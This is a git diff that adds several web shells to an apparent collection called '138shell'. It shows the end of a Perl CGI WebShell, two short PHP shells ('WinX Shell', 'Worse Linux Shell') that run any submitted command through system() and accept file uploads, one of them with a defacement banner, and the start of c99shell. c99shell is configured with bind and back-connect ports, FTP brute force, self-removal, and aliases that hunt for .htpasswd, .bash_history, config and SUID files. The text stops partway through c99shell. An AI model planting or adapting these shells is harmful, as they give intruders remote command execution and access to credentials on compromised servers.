+    my ($self, $input) = @_;
+    my $statements = [];
+    my $start = 0;
+    while ($input =~ /(\[%\s*(.*?)\s*%\])/g) {
+        my $match_end = pos($input);
+        my $match_start = $match_end - length($1);
+        if ($start < $match_start) {
+            my $text = substr($input, $start, $match_start-$start);
+            push @$statements, { id => 'text', text => $text };
+        }
+        push @$statements, $self->parse_command($2);
+        $start = $match_end;
+    }
+    if ($start < length($input)) {
+        my $text = substr($input, $start);
+        push @$statements, { id => 'text', text => $text };
+    }
+    return $statements;
+}
+
+sub parse_command {
+    my ($self, $command) = @_;
+    if ($command =~ /^if\s+(\w+(\.\w+)*)$/) {
+        return { id => 'if', test => $1, };
+    }
+    elsif ($command =~ /^elif\s+(\w+(\.\w+)*)$/) {
+        return { id => 'elif', test => $1 };
+    }
+    elsif ($command =~ /^else$/) {
+        return { id => 'else' };
+    }
+    elsif ($command =~ /^for\s+(\w+)\s+in\s+(\w+(\.\w+)*)$/) {
+        return { id => 'for', name => $1, list => $2 };
+    }
+    elsif ($command =~ /^end$/) {
+        return { id => 'end' };
+    }
+    elsif ($command =~ /^(\w+(\.\w+)*)(\s+as\s+(\w+))$/) {
+        return { id => 'print', variable => $1, format => $4 };
+    }
+    else {
+        die "invalid command: '$command'";
+    }
+}
+
+sub compile {
+    my ($self, $statements) = @_;
+    my $operation = $self->compile_sequence($statements);
+    if (scalar(@$statements)) {
+        my $statement = shift(@$statements);
+        my $id = $statements->{id};
+        die "unexpected statement: '$id'";
+    }
+    return $operation;
+}
+
+sub compile_sequence {
+    my ($self, $statements) = @_;
+    my $operations = [];
+    while (scalar(@$statements) > 0) {
+        my $id = $statements->[0]->{id};
+        if ($id eq 'if') {
+            push @$operations, $self->compile_condition($statements);
+        }
+        elsif ($id eq 'for') {
+            push @$operations, $self->compile_loop($statements);
+        }
+        elsif ($id eq 'print' or $id eq 'text') {
+            my $statement = shift @$statements;
+            push @$operations, $statement;
+        }
+        else {
+            last;
+        }
+    }
+    return { id => 'sequence', operations => $operations };
+}
+
+sub compile_condition {
+    my ($self, $statements) = @_;
+    my $conditions = [];
+    my $statement = shift @$statements;
+    my $id = defined $statement ? $statement->{id} : 'none';
+    while ($id eq 'if' or $id eq 'elif' or $id eq 'else') {
+        my $test = $id ne 'else' ? $statement->{test} : undef;
+        my $operation = $self->compile_sequence($statements);
+        push @$conditions, { test => $test, operation => $operation };
+        $statement = shift @$statements;
+        $id = defined $statement ? $statement->{id} : 'none';
+    }
+    die "'end' expected, but '$id' found" unless $id eq 'end';
+    return { id => 'condition', conditions => $conditions };
+}
+
+sub compile_loop {
+    my ($self, $statements) = @_;
+    my $statement = shift @$statements;
+    my $name = $statement->{name};
+    my $list = $statement->{list};
+    my $operation = $self->compile_sequence($statements);
+    $statement = shift @$statements;
+    my $id = defined $statement ? $statement->{id} : 'none';
+    die "'end' expected, but '$id' found" unless $id eq 'end';
+    return { id => 'loop',
+        name => $name, list => $list, operation => $operation };
+}
+
+sub evaluate {
+    my ($self, $operation, $keywords) = @_;
+    $keywords->{loop} = {};
+    my $chunks = $self->evaluate_operation($operation, $keywords);
+    return join('', @$chunks);
+}
+
+sub evaluate_operation {
+    my ($self, $operation, $keywords) = @_;
+    if ($operation->{id} eq 'condition') {
+        return $self->evaluate_condition($operation->{conditions}, $keywords);
+    }
+    elsif ($operation->{id} eq 'loop') {
+        return $self->evaluate_loop($operation->{name}, $operation->{list},
+                $operation->{operation}, $keywords);
+    }
+    elsif ($operation->{id} eq 'print') {
+        return $self->evaluate_print($operation->{variable},
+                $operation->{format}, $keywords);
+    }
+    elsif ($operation->{id} eq 'sequence') {
+        my $chunks = [];
+        push @$chunks, @{$self->evaluate_operation($_, $keywords)}
+                for (@{$operation->{operations}});
+        return $chunks;
+    }
+    elsif ($operation->{id} eq 'text') {
+        return [$operation->{text}];
+    }
+}
+
+sub evaluate_condition {
+    my ($self, $conditions, $keywords) = @_;
+    for my $condition (@$conditions) {
+        my $test = $condition->{test};
+        my $value = defined $test ?
+                $self->evaluate_variable($test, $keywords) : 1;
+        return $self->evaluate_operation($condition->{operation}, $keywords)
+                    if $value;
+    }
+    return [];
+}
+
+sub evaluate_loop {
+    my ($self, $name, $list, $operation, $keywords) = @_;
+    my $values = $self->evaluate_variable($list, $keywords);
+    my $length = scalar(@$values);
+    my $index = 0;
+    my $chunks = [];
+    for my $value (@$values) {
+        $keywords->{$name} = $value;
+        $keywords->{loop}->{$name} = {
+            index => $index, number => $index+1,
+            first => $index == 0, last => $index == $length-1,
+            odd => $index % 2 == 1, even => $index % 2 == 0,
+        };
+        push @$chunks, @{$self->evaluate_operation($operation, $keywords)};
+        $index++;
+    }
+    delete $keywords->{$name};
+    delete $keywords->{loop}->{$name};
+    return $chunks;
+}
+
+sub evaluate_print {
+    my ($self, $variable, $format, $keywords) = @_;
+    my $value = $self->evaluate_variable($variable, $keywords);
+    if ($format eq 'html') {
+        for ($value) { s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; }
+    }
+    elsif ($format eq 'nbsp') {
+        for ($value) {
+            s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; s/ /&nbsp;/g;
+        }
+    }
+    elsif ($format eq 'url') {
+        $value =~ s/(\W)/sprintf('%%%02X', ord($1))/eg;
+    }
+    elsif ($format ne '') {
+        
+        die "unknown format: '$format'";
+    }
+    return [$value];
+}
+
+sub evaluate_variable {
+    my ($self, $variable, $keywords) = @_;
+    my $value = $keywords;
+    for my $name (split(/\./, $variable)) {
+        $value = $value->{$name};
+    }
+    return $value;
+}
+
+###############################################################################
+
+package WebShell::Script;
+
+use CGI;
+use CGI::Carp qw(fatalsToBrowser);
+use IPC::Open3;
+use Cwd;
+use POSIX;
+
+sub new {
+    my ($class) = @_;
+    my $self = bless { }, $class;
+    $self->initialize();
+    return $self;
+}
+
+sub query {
+    my ($self, @names) = @_;
+    my @values = ();
+    for my $name (@names) {
+        my $value = $self->{cgi}->param($name);
+        for ($value) { s/^\s+//; s/\s+$//; }
+        push @values, $value;
+    }
+    return wantarray ? @values : "@values";
+}
+
+sub initialize {
+    my ($self) = @_;
+    $self->{cgi} = new CGI;
+    $self->{cwd} = $self->{cgi}->cookie(-name => 'WebShell-cwd');
+    $self->{cwd} = cwd unless defined $self->{cwd};
+    $self->{cwd} = cwd if $WebShell::Configuration::restricted_mode;
+    $self->{login} = 0;
+    my $login = $self->{cgi}->cookie(-name => 'WebShell-login');
+    my $password = $self->query('password');
+    $self->{login} = 1
+            if crypt($WebShell::Configuration::password, $login."XX") eq $login;
+    $self->{login} = 1 if $password eq $WebShell::Configuration::password;
+}
+
+sub run {
+    my ($self) = @_;
+    return $self->login_action unless $self->{login};
+    my $action = $self->query('action');
+    $action = 'default' unless $action =~ /^\w+$/;
+    $action = $self->can($action . '_action');
+    $action = $self->can('default_action') unless defined $action;
+    $self->$action();
+}
+
+sub default_action {
+    my ($self) = @_;
+    $self->publish('INPUT');
+}
+
+sub login_action {
+    my ($self) = @_;
+    $self->publish('LOGIN', error => ($self->query('password') ne ''));
+}
+
+sub command {
+    my ($self, $command) = @_;
+    chdir($self->{cwd});
+    my $pid = open3(\*WRTH, \*RDH, \*ERRH, "/bin/sh");
+    print WRTH "$command\n";
+    close(WRTH);
+    my $output = do { local $/; <RDH> };
+    my $error = do { local $/; <ERRH> };
+    waitpid($pid, 0);
+    return ($output, $error);
+}
+
+sub forbidden_command {
+    my ($self, $command) = @_;
+    my $error = "This command is not available in the restricted mode.\n";
+    $error .= "You may only use the following commands:\n";
+    for my $ok_command (@$WebShell::Configuration::ok_commands) {
+        $error .= "    $ok_command\n";
+    }
+    return ('', $error);
+}
+
+sub cd_command {
+    my ($self, $command) = @_;
+    my $error;
+    my $directory = $1 if $command =~ /^cd\s+(\S+)$/;
+    warn "cwd: '$self->{cwd}'\n";
+    warn "command: '$command'\n";
+    warn "directory: '$directory'\n";
+    if ($directory ne '') {
+        $error = $! unless chdir($self->{cwd});
+        $error = $! unless chdir($directory);
+    }
+    $self->{cwd} = cwd;
+    return ('', $error);
+}
+
+sub execute_action {
+    my ($self) = @_;
+    my $command = $self->query('command');
+    my $user = getpwuid($>);
+    my $old_line = "[$user: $self->{cwd}]\$ $command";
+    my ($output, $error);
+    if ($command ne "") {
+        my $allow = not $WebShell::Configuration::restricted_mode;
+        for my $ok_command (@$WebShell::Configuration::ok_commands) {
+            $allow = 1 if $command eq $ok_command;
+        }
+        if ($allow) {
+            $command =~ /^(\w+)/;
+            if (my $method = $self->can("${1}_command")) {
+                ($output, $error) = $self->$method($command);
+            }
+            else {
+                ($output, $error) = $self->command($command);
+            }
+            
+        }
+        else {
+            ($output, $error) = $self->forbidden_command($command);
+        }
+    }
+    my $new_line = "[$user: $self->{cwd}]\$ " unless $command eq "";
+    $self->publish('EXECUTE',
+        old_line => $old_line, new_line => $new_line,
+        output => $output, error => $error);
+}
+
+sub browse_action {
+    my ($self) = @_;
+    my $error = "";
+    my $path = $self->query('path');
+    if ($WebShell::Configuration::restricted_mode and $path ne '') {
+        $error = "You cannot browse directories in the restricted mode.";
+        $path = "";
+    }
+    $error = $! unless chdir($self->{cwd});
+    if ($path ne '') {
+        $error = $! unless chdir($path);
+    }
+    $self->{cwd} = cwd;
+    opendir(DIR, '.');
+    my @dir = readdir(DIR);
+    closedir(DIR);
+    my @entries = ();
+    for my $name (@dir) {
+        my ($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size,
+            $atime, $mtime, $ctime, $blksize, $blocks) = stat($name);
+        my $modestr = S_ISDIR($mode) ? 'd' : '-';
+        $modestr .= ($mode & S_IRUSR) ? 'r' : '-';
+        $modestr .= ($mode & S_IWUSR) ? 'w' : '-';
+        $modestr .= ($mode & S_ISUID) ? 's' : ($mode & S_IXUSR) ? 'x' : '-';
+        $modestr .= ($mode & S_IRGRP) ? 'r' : '-';
+        $modestr .= ($mode & S_IWGRP) ? 'w' : '-';
+        $modestr .= ($mode & S_ISGID) ? 's' : ($mode & S_IXGRP) ? 'x' : '-';
+        $modestr .= ($mode & S_IROTH) ? 'r' : '-';
+        $modestr .= ($mode & S_IWOTH) ? 'w' : '-';
+        $modestr .= ($mode & S_IXOTH) ? 'x' : '-';
+        my $userstr = getpwuid($uid);
+        my $groupstr = getgrgid($gid);
+        my $sizestr = ($size < 1024) ? $size :
+                        ($size < 1024*1024) ? sprintf("%.1fk", $size/1024) :
+                        sprintf("%.1fM", $size/(1024*1024));
+        my $timestr = strftime('%H:%M %b %e %Y', localtime($mtime));
+        push @entries, {
+            name => $name,
+            type_file => S_ISREG($mode),
+            type_dir => S_ISDIR($mode),
+            type_exec => ($mode & S_IXUSR),
+            mode => $modestr,
+            user => $userstr,
+            group => $groupstr,
+            order => (S_ISDIR($mode) ? 0 : 1) . $name,
+            all_rights => (-w $name),
+            size => $sizestr,
+            time => $timestr,
+        };
+    }
+    @entries = sort { $a->{order} cmp $b->{order} } @entries;
+    my @directory = ();
+    my $path = '';
+    for my $name (split m|/|, $self->{cwd}) {
+        $path .= "$name/";
+        push @directory, {
+            name => $name,
+            path => $path,
+        };
+    }
+    @directory = ({ name => '', path => '/'}) unless @directory;
+    $self->publish('BROWSE', entries => \@entries, directory => \@directory,
+            error => $error);
+}
+
+sub publish {
+    my ($self, $template, %keywords) = @_;
+    $template = eval '$WebShell::Templates::' . $template . '_TEMPLATE';
+    my $xit = new WebShell::MiniXIT;
+    my $text = $xit->substitute($template, %keywords);
+    $self->{cgi}->url =~ m{^http://([^/]*)(.*)/[^/]*$};
+    my $domain = $1;
+    my $path = $2;
+    my $cwd_cookie = $self->{cgi}->cookie(
+        -name => 'WebShell-cwd',
+        -value => $self->{cwd},
+        -domain => $domain,
+        -path => $path,
+    );
+    my $login = "";
+    if ($self->{login}) {
+        my $salt = join '',
+                ('.', '/', 0..9, 'A'..'Z', 'a'..'z')[rand 64, rand 64];
+        $login = crypt($WebShell::Configuration::password, $salt);
+    }
+    my $login_cookie = $self->{cgi}->cookie(
+        -name => 'WebShell-login',
+        -value => $login,
+        -domain => $domain,
+        -path => $path,
+    );
+    print $self->{cgi}->header(-cookie => [$cwd_cookie, $login_cookie]);
+    print $text;
+}
+
+###############################################################################
+
+package WebShell;
+
+my $script = new WebShell::Script;
+$script->run;
+
+###############################################################################
+###############################################################################
diff --git a/138shell/W/WinX Shell.txt b/138shell/W/WinX Shell.txt
new file mode 100644
index 0000000..9957c9f
--- /dev/null
+++ b/138shell/W/WinX Shell.txt	
@@ -0,0 +1,103 @@
+<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
+<body bgcolor="#FFFFFF" text="#000000" link="#0066FF" vlink="#0066FF" alink="#0066FF">
+<?php
+
+// -----:[ Start infomation ]:-----
+// It's simple shell for all Win OS.
+// Created by greenwood from n57
+//
+// ------:[ End infomation]:-------
+
+
+set_magic_quotes_runtime(0);
+//*Variables*
+
+//-------------------------------
+
+$veros = `ver`;
+$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
+$windir = `echo %windir%`;
+
+
+//------------------------------
+   if( $cmd == "" ) {
+    $cmd = 'dir /OG /X';
+  }
+//-------------------------------
+
+
+//------------------------------
+
+print "<table  style=\"font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: 1px #000000 dotted\"  border=\"0\" cellspacing=\"1\" cellpadding=\"2\"  >";
+print    "<tr>";
+print      "<td><font color=\"#990000\">You:</font></td>" ;
+print      "<td> ".$_SERVER['REMOTE_ADDR']." [<font color=\"#0033CC\">".$host."</font>] </td>" ;
+print    "</tr>";
+print    "<tr>";
+print      "<td><font color=\"red\">Version OS:</font></td>" ;
+print      "<td><font color=\"#0066CC\"> $veros </font></td>";
+print    "</tr>";
+print    "<tr>";
+print     "<td><font color=\"#990000\">Server:</font></td>";
+print      "<td><font color=\"#0066CC\">".$_SERVER['SERVER_SIGNATURE']."</font></td>";
+print    "</tr>";
+print    "<tr>";
+print     "<td><font color=\"#990000\">Win Dir:</font></td>";
+print      "<td><font color=\"#0066CC\"> $windir </font></td>";
+print    "</tr>";
+print  "</table>";
+print  "<br>";
+
+//------- [netstat -an] and [ipconfig] and [tasklist] ------------
+print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"netstat -an\">";
+print "&nbsp;&nbsp;&nbsp;";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"ipconfig\">";
+print "&nbsp;&nbsp;&nbsp;";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"tasklist\">";
+print "</form>";
+//-------------------------------
+
+
+//-------------------------------
+
+print "<textarea style=\"width:100%; height:50% ;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" readonly>";
+       system($cmd);
+print "</textarea>";
+print "<br>";
+
+//-------------------------------
+
+print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">CMD: </font>";
+print "<br>";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:50%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"text\" name=\"cmd\" value=\"$cmd\">";
+print " <input style = \"font-family: Verdana; font-size: 12px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"_run\" value=\"Run\">";
+print "</form>";
+
+//-------------------------------
+
+print "<form  enctype=\"multipart/form-data\" action=\"$PHP_SELF\" method=\"post\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Upload:</font>";
+print "<br>";
+print "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </font><input style=\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"userfile\" type=\"file\">";
+print " <font face=\"Verdana\" size=\"1\" color=\"#990000\">Filename on server: </font> <input style=\"font-family: Verdana; font-size: 9px;background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"serverfile\" type=\"text\">";
+print" <input style =\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" value=\"Send\">";
+print"</form>";
+
+?>
+
+
+<?
+
+// Script for uploading
+ if (is_uploaded_file($userfile)) {
+move_uploaded_file($userfile, $serverfile);
+}
+
+?>
+
+
+<center><font face="Verdana" size="1" color="#000000">Created by -:[GreenwooD]:- </font></center>
+</body></html>
\ No newline at end of file
diff --git a/138shell/W/Worse Linux Shell.txt b/138shell/W/Worse Linux Shell.txt
new file mode 100644
index 0000000..434721a
--- /dev/null
+++ b/138shell/W/Worse Linux Shell.txt	
@@ -0,0 +1,69 @@
+<?php
+
+set_magic_quotes_runtime(0);
+
+print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
+print "<center><h1>#worst @dal.net</h1></center>";
+print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
+print "<center><h1>Watch Your system Shany was here.</h1></center>";
+print "<center><h1>Linux Shells</h1></center>";
+print "<hr><hr>";
+
+$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
+$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
+
+$UName  = `uname -a`;
+$SCWD   = `pwd`;
+$UserID = `id`;
+
+if( $currentWD == "" ) {
+    $currentWD = $SCWD;
+}
+
+print "<table>";
+print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
+print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
+print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
+print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
+print "</table>";
+
+print "<hr><hr>";
+
+if( $_POST['_act'] == "List files!" ) {
+    $currentCMD = "ls -la";
+}
+
+print "<form method=post enctype=\"multipart/form-data\"><table>";
+
+print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
+print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
+
+print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
+print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
+
+print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
+print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
+
+print "</table></form><hr><hr>";
+
+$currentCMD = str_replace("\\\"","\"",$currentCMD);
+$currentCMD = str_replace("\\\'","\'",$currentCMD);
+
+if( $_POST['_act'] == "Upload!" ) {
+    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
+        print "<center><b>Error while uploading file!</b></center>";
+    } else {
+        print "<center><pre>";
+        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+        print "</pre><b>File uploaded successfully!</b></center>";
+    }    
+} else {
+    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
+    $currentCMD = "cd ".$currentWD.";".$currentCMD;
+    system($currentCMD);
+    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
+}
+
+exit;
+
+?>
diff --git a/138shell/W/w.php.txt b/138shell/W/w.php.txt
new file mode 100644
index 0000000..cd63ef0
--- /dev/null
+++ b/138shell/W/w.php.txt
@@ -0,0 +1,2653 @@
+<?php
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+
+$shver = "1.0 pre-release build #17"; //Current version
+//CONFIGURATION AND SETTINGS
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
+}
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+//Authentication
+$login = ""; //login
+//DON'T FORGOT ABOUT PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
+
+$gzipencode = TRUE; //Encode with gzip?
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+
+$donated_html = "<center><b>donated_html</b></center>";
+/* If you publish free shell and you wish
+add link to your site or any other information,
+put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "prozente@gmail.com"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
+
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+0 - files and folders (as default),
+1 - files only, 2 - folders only
+  string {opentag} - open html-tag, e.g. "<b>" (default)
+  string {closetag} - close html-tag, e.g. "</b>" (default)
+  bool {break} - if TRUE and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+ // array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";  // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$datapipe_localport = "8081"; // default port for datapipe
+
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+$usefsbuff = TRUE; //Buffer-function
+$copy_unset = FALSE; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+ array("<hr><b>[Home]</b>",$surl),
+ array("<b>[Back]</b>","#\" onclick=\"history.back(1)"),
+ array("<b>[Forward]</b>","#\" onclick=\"history.go(1)"),
+ array("<b>[UPDIR]</b>",$surl."act=ls&d=%upd&sort=%sort"),
+ array("<b>[Refresh]</b>",""),
+ array("<b>[Search]</b>",$surl."act=search&d=%d"),
+ array("<b>[Buffer]</b>",$surl."act=fsbuff&d=%d"),
+ array("<b>[Encoder]</b></b>",$surl."act=encoder&d=%d"),
+ array("<b>[Tools]</b>",$surl."act=tools&d=%d"),
+ array("<b>[Proc.]</b>",$surl."act=processes&d=%d"),
+ array("<b>[FTP brute]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>[Sec.]</b>",$surl."act=security&d=%d"),
+ array("<b>[SQL]</b>",$surl."act=sql&d=%d"),
+ array("<b>[PHP-code]</b>",$surl."act=eval&d=%d"),
+ array("<b>[Self remove]</b>",$surl."act=selfremove"),
+ array("<b>[Logout]</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
